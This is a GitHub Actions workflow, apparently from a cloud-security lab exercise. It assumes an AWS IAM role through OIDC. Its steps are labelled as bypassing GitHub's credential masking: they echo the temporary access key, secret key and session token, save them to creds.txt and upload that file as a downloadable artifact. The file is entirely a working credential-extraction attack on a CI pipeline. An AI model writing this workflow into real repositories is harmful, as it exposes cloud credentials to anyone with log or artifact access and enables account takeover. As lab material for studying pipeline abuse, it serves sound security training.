name: Print AWS Temporary Credentials

on:
  workflow_dispatch:     # Allows manual triggering

permissions:
  id-token: write       # Required for OIDC token exchange
  contents: read        # Allows reading repository contents

jobs:
  get-creds:
    runs-on: ubuntu-latest

    steps:
      - name: Configure AWS credentials via OIDC
        uses: aws-actions/configure-aws-credentials@v2
        with:
          role-to-assume: arn:aws:iam::481008523238:role/whitebox-lab-2-github-actions-role
          aws-region: us-east-1

      - name: Bypass GitHub Credential Masking
        run: |
          echo "MY_ACCESS_KEY_ID=$AWS_ACCESS_KEY_ID"
          echo "MY_SECRET_ACCESS_KEY=$AWS_SECRET_ACCESS_KEY"
          echo "MY_SESSION_TOKEN=$AWS_SESSION_TOKEN"

      - name: Save credentials to file
        run: |
          echo "AWS_ACCESS_KEY_ID=$AWS_ACCESS_KEY_ID" > creds.txt
          echo "AWS_SECRET_ACCESS_KEY=$AWS_SECRET_ACCESS_KEY" >> creds.txt
          echo "AWS_SESSION_TOKEN=$AWS_SESSION_TOKEN" >> creds.txt

      - name: Upload credentials artifact
        uses: actions/upload-artifact@v3
        with:
          name: aws-creds
          path: creds.txt

      - name: Show caller identity
        run: aws sts get-caller-identity
